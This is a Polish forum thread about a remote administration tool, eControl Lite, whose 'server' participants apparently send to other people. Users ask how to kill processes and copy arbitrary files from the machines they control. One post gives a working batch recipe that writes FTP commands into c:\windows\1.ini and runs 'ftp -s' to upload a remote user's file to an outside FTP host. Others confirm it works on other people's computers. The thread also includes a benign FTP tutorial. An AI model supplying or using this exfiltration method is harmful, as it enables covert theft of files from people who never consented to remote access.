Nowy program do zdalnej administracji eControl Lite

tofik_

Użytkownik
Dołączył
Luty 9, 2007
Posty
17
Witajcie, mam takie pytanie, chce zabic proces gg.exe wlasnie w tym programie
smile.gif
pod konsloa wpisuje tasklist i wyswietla mi liste procesów
smile.gif
i jak teraz zabic jeden z nich ?? np gg.exe ?? prosze o pomoc z gory dziekuje i pozdrawiam
 

3rr0rx

Użytkownik
Dołączył
Luty 10, 2007
Posty
712
Taskkill /PID [numer procesu]
btw. to jak pomoze mi ktos z moim problemem ?
 

3rr0rx

Użytkownik
Dołączył
Luty 10, 2007
Posty
712
Dociekłem już czego to jest przyczyna. Winny był router który nie jest odpowiednio skonfigurowany.Podczas gdy do PC podłączony jest zwyczajny modem [od neozdrady] wtedy w TFTPD32 w okienku server interfaces jest wyświetlane Moje IP. Lecz gdy łączę się za pośrednictwem routera mam podane: 10.0.0.3 i pliki nie są przesyłane :| czy wie ktoś może jak poprawnie skonfigurować router pod kątem TFTPD !?
Model routera: Cerberus ADSL LITE [od Pentagram'a]
99cafa1f6d61d72c.jpg

Pozdrawiam.
Z góry przepraszam ze ten mały off topic
smile.gif
 

tofik_

Użytkownik
Dołączył
Luty 9, 2007
Posty
17
mam taki pomysl, a jednoczesnie pytanie...
smile.gif
:mruga: czy jest mozliwosc skopiowania od osoby pliku dowlonie jakiego znajdujacego sie u kogos z kim loncze sie przez eControl na serwer ftp?? np taki
ftp://lol:[email protected]/

jesli jes taka mozliwosc to jaka jest komenda ?? albo jak to zrobic ?? prosze o pomoc
 

Radar41

Użytkownik
Dołączył
Luty 28, 2005
Posty
53
Originally posted by tofik_
mam taki pomysl, a jednoczesnie pytanie...
smile.gif
:mruga: czy jest mozliwosc skopiowania od osoby pliku dowlonie jakiego znajdujacego sie u kogos z kim loncze sie przez eControl na serwer ftp?? np taki
ftp://lol:[email protected]/

jesli jes taka mozliwosc to jaka jest komenda ?? albo jak to zrobic ?? prosze o pomoc

+1 dokładnie.

Ja sprawdziłem i mam fatalny ping do osoby której wysłałem serwer. Praktycznie go nie ma.Upłynął limit czasu. I jak chce przesłac sobie jakikolwiek plik to wszystko idzie pięknie ale niestety dane u mnie ważą 0KB ;/ i sa po prostu puste.
Podejrzewam ze to wina własnie PINGu i zapewne gubi pakiety gdzies w kosmosie i dane sie rozpływają albo zrywa połaczenie i zapisuje 0 dane.

A na jakis serwerjakby sie dalo wysłać, to by było miodzio
<
program łaczy sie rewelacyjnie.Pozdro Czekam na taką full wersje, chętnie sie dorzuce
smile.gif
pozdro

Kod:
Niektóre darmowe witryny udostępniają miejsce na swoich serwerach na strony www. UWAGA Przy okazji mają też własne stronki do wysyłania plików. Ale Ty bądź lepszy i zrób to sam!  To jest taki mały przewodnik dla tych, którzy nie mieli z tym nigdy styczności.



Zakładamy konto (darmowe bądź nie) na jakimś serwerze. Dla przykładu mam konto: milinski na serwerze student.agh.edu.pl (darmowe, jeśli jesteś studentem AGH )



Opis ftp textowego:

1. Uruchamiamy ftp : Start -> Uruchom -> "ftp"

Jesteśmy w trybie textowym i widzimy znak zachęty: ftp>

2. Łączymy się z naszym serwerem : open host <Enter>

Widzimy:

ftp> open student.agh.edu.pl

Połączony z student.agh.edu.pl.

220 students ftp server student.uci.agh.edu.pl

Użytkownik (student.agh.edu.pl: (none)):

3. Logujemy się (login i hasło)

Widzimy:

Użytkownik (student.agh.edu.pl: (none)): milinski

331 Password required for milinski.

Hasło: ***************

230 User milinski logged in.

ftp>



Jesteśmy zalogowani na serwerze. Jeśli przez ten etap przeszedłeś/przeszłaś szczęśliwie, to świetnie. Teraz: jak co robić?

Wszystkie polecenia, jakie będziemy teraz wpisywać, będą wykonywane na zdalnym serwerze

lub na maszynie lokalnej. Polecenia, które będą się zaczynały wykrzyknikiem ( ! ) będą interpretowane jako polecenia systemowe. Tak więc wykonanie polecenia: !dir spowoduje wyświetlenie zawartości lokalnego katalogu. W przypadku przemieszczania się po lokalnej strukturze katalogów używamy polecenia lcd (składnie taka sama, jak cd). Najczęściej spotykamy się z serwerami postawionymi na rodzinie unixa, więc pokrótce omówię podstawowe polecenia, tylko na nasz użytek. Aha. Moje założenie jest takie, że masz windowsa, bo ludzie, którzy mają Linuxa zakładam, że to umieją



komenda na lokalnej maszynie (DOS) <=> komenda unixa - opis

!dir <=> ls - wyświetla zawartość katalogu

md nazwa <=> mkdir nazwa - tworzy nowy katalog

lcd scieżka <=> cd ścieżka - przemieszczamy się po strukturze katalogów

!cd <=> pwd - wyświetlenie ścieżki katalogu, w którym jesteśmy

lcd <=> cd - przechodzimy do tzw. katalogu domowego . W windzie domyślnie c:, w linuxie /home

Teraz chcemy wysłać nasze wspaniałe zdjęcia na serwer. Co zrobić? Otóż:

a. przechodzimy sobie najpierw do katalogu, w którym mamy zdjęcia, np. lcd c:tibiamoje_ssy

b. tworzymy na serwerze katalog, w którym chcemy umieścić nasze zdjęcia, np. mkdir fajne_screeny

c. przechodzimy do tegoż katalogu cd fajne_screeny

Po tych czynnościach mamy ustawiony lokalny katalog, z którego chcemy wysłać screeny i zdalny katalog, w którym chcemy, żeby się znalazły. Lecimy dalej

d. piszemy polecenie: bin - ustawia nam ono przesyłanie plików w trybie binarnym

e. piszemy polecenie: hash - przy użyciu znaczków '#' jesteśmy informowani, jak duża część pliku została wysłana (pomocne przy większych plikach, my możemy sobie to w sumie darować...

f. piszemy: put plik.jpg - to polecenie wysyła nam plik plik.jpg na serwer do katalogu zdalnego, wcześniej ustawionego. Jeśli chcemy wysłać więcej plików, posługujemy się poleceniem mput *.* (przykład). Maskę plików możemy sobie dobrać dowolnie.

Przed wysłaniem każdego pliku będzie nam zadawane pytanie, czy jesteśmy pewni, że chcemy dany plik wysłać. Oczywiście, potwierdzamy. Ale jeśli mamy dużo plików, może to być uciążliwe. Żeby wyłączyć ten tryb pytania, wystarczy wpisać polecenie: prompt.

Pliki są wysłane, więc możemy komuś teraz podać linka do katalogu z naszymi zdjęciami lub po prostu link do zdjęcia. W moim przypadku link będzie wyglądał następująco: [url]http://student.uci.agh.edu.pl/~milinski/fajne_screeny/[/url]. UWAGA



Tzn tu jest jeszcze taki motyw z katalogiem public_html, ale na darmowych stronach jest to jakoś dziwnie zrobione, nie wgłębiałem się. Jakby coś było nie tak, to piszcie, a wszystko wytłumaczę

Rozłączamy się ze zdalnym serwerem jednocześnie wychodząc z programu poleceniem: bye



Jutro popołudniu część II, czyli graficzny klient ftp na przykładzie LeechFTP (przygotujcie się - na google.pl wpiszcie: "leechftp download free" i ściągniejcie sobie i zainstalujcie, a ja objaśnię obsługę + screeny)



edit by n3m3s1s:

Graficzny klient FTP jest znacznie prostszy w obsłudze, więc skupmy się może na nim bo podejrzewam, że połowa użytkowników forum nie skuma sposobu pierwszego i wybierze drugi

Osobiście używam Total Commandera.

btw: przyklejam bo się przyda
Znalazłem taki artukul. Jutro bede testował co on wart.
 

tofik_

Użytkownik
Dołączył
Luty 9, 2007
Posty
17
kurcze wszystko by bylo tylko lonczac sie prze ten program dochodzi do momentu

uzytkownik (ftp.republika.pl:(none)): wpisuje login i enter

i nic sie nie dzieje, czemu ??
 

Radar41

Użytkownik
Dołączył
Luty 28, 2005
Posty
53
Originally posted by tofik_
kurcze wszystko by bylo tylko lonczac sie prze ten program dochodzi do momentu

uzytkownik (ftp.republika.pl:(none)): wpisuje login i enter

i nic sie nie dzieje, czemu ??

A juz sie bałem ze to tak tylko u mnie.;/ Jak sobie u siebie odpalisz FTP to działa a jak przez ten program to rzeczywiscie sie zatrzymuje na haśle;/ Wie ktos dlaczego?

EDIT:

Dobra Panowie i Panie mam
smile.gif

Odpalamy cmd i piszemy:

Kod:
echo open ftp.republika.pl>>c:windows1.ini  --> ENTER :)

echo login>>c:windows1.ini --> ENTER

echo hasło>>c:windows1.ini ---> ENTER

echo binary>>c:windows1.ini --> ENTER

echo hash>>c:windows1.ini --> ENTER

echo put c:mp31.mp3>>c:windows1.ini --> ENTER (moze byc get z FTP)

echo quit>>c:windows1.ini --> ENTER



No i odpalamy to poleceniem:

ftp -s:c:windows1.ini --> ENTER :)



Powinno działac. U mnie śmiga:)
Podziękowania dla Spox
<


Aha jakbyscie cos skopali to potem nazwijcie ten plik inaczej niz 1.ini bo on sie nie kasuje, tylko ciągle sie do niego dane dopisują. Zmiencie np na 2.ini.
 

econtrol

Użytkownik
Dołączył
Luty 5, 2007
Posty
8
Pliki były puste ponieważ tftp wymaga jeszcze jednego parametru... jeśli chodzi o udoskonalanie to mam problemy w szkole (głównie rosyjski - jak ktoś chce pomóc to niech pisze
<
) i własnie ukonczłem nowy projekt http://f4a.pl na który przy okazji zapraszam... dziękuję serdecznie za opinie. Przy okazji odpowiem na pytanie czemu program blokuje się na haśle, otóż ftp to całkiem inny program a my możemy zarządzać tylko cmd.exe i uruchamiać w nim inne programy ale tylko z parametrami, ftp to inny problem i eControl lite nie może do niego wysyłąć poleceń... eControl byl pisany zaledwie kilka dni dlatego może tyle niedopracowań
smile.gif


Poprawiony readme
http://lite.econtrol.pl/files.html
 

tofik_

Użytkownik
Dołączył
Luty 9, 2007
Posty
17
to jest super genialny pomysl
smile.gif


Kod:
echo open ftp.republika.pl>>c:windows1.ini  --> ENTER :) 

echo login>>c:windows1.ini --> ENTER 

echo hasło>>c:windows1.ini ---> ENTER 

echo binary>>c:windows1.ini --> ENTER 

echo hash>>c:windows1.ini --> ENTER 

echo put c:mp31.mp3>>c:windows1.ini --> ENTER (moze byc get z FTP) 

echo quit>>c:windows1.ini --> ENTER 



No i odpalamy to poleceniem: 

ftp -s:c:windows1.ini --> ENTER :)

wszystko daiala jak nalezy, tylko powiedzcie co zrobic jak na jedny mkompie juz cos chce sciagnac i wystakuje komunikat o teresci
Kod:
polonczenie przerwane przez zdalnego hosta
co zrobic zemy moc cos sciagnac ??
 

tofik_

Użytkownik
Dołączył
Luty 9, 2007
Posty
17
wpisuje wszystko jak nalezy, bo u innych osob tak chodzi
smile.gif
tylko mam kilka innych u ktorych jak proboje cos sciagnac to wyskakuje
Kod:
polonczenie przerwane przez hosta zdalnego
i normalnie przerya caly proces wysylania
<
czego to moze byc wina ??
 

tofik_

Użytkownik
Dołączył
Luty 9, 2007
Posty
17
wiec wpisuje tak:
Kod:
echo open ftp.republika.pl>>c:windows1.ini

echo login>>c:windows1.ini

echo haslo>>c:windows1.ini

echo binary>>c:windows1.ini

echo hash>>c:windows1.ini

echo put c:2.jpg>>c:windows1.ini

echo quit>>c:windows1.ini
i odpalam poleceniem
Kod:
ftp -s:c:windows1.ini

a wyglada to tak:


host.jpg
 

3rr0rx

Użytkownik
Dołączył
Luty 10, 2007
Posty
712
Originally posted by tofik_
wiec wpisuje tak:
Kod:
echo open ftp.republika.pl>>c:windows1.ini

echo login>>c:windows1.ini

echo haslo>>c:windows1.ini

echo binary>>c:windows1.ini

echo hash>>c:windows1.ini

echo put c:2.jpg>>c:windows1.ini

echo quit>>c:windows1.ini
i odpalam poleceniem
Kod:
ftp -s:c:windows1.ini

a wyglada to tak:


Obrazek
u mnie dokladnie tak samo...
 
Do góry Bottom